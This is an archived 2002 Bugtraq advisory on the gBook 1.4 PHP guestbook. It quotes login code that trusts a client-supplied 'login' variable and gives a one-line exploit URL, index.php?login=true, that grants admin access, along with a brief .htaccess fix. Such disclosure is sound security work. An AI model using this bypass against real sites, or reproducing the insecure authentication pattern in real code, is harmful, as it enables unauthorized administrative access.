[27565] in bugtraq
gBook
daemon@ATHENA.MIT.EDU (Frog Man)
Tue Oct 22 18:31:32 2002
From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com
Date: Tue, 22 Oct 2002 22:28:49 +0200
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Message-ID: <F40XhnUSY9C7PMjuQFz0000cf5a@hotmail.com>
Informations :
°°°°°°°°°°°°°°
Language : PHP
Tested version : 1.4
Problem : Admin access
PHP Code :
°°°°°°°°°°
/gb/index.php :
------------------------------------------------------
<?php
include("config.inc.php");
if($action == "login") {
if($user == $loginu && $pw == $loginpw)
{
setcookie("login", "true", time()+3600);
header("location: index.php");
}
else
{
setcookie("login", "false", -3600);
header("location: index.php?fehler=login");
}
}
?>
[...]
<?php
if($login == "true")
{
[ADMIN CODE]
[...]
------------------------------------------------------
Exploit :
°°°°°°°°°
http://[Target]/gb/index.php?login=true
Patch :
°°°°°°°
Using of .htaccess.
More details in french :
http://www.frog-man.org/tutos/gBook.txt
Translated by google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FgBook.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII
frog-m@n
_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis !
http://www.msn.fr/msger/default.asp
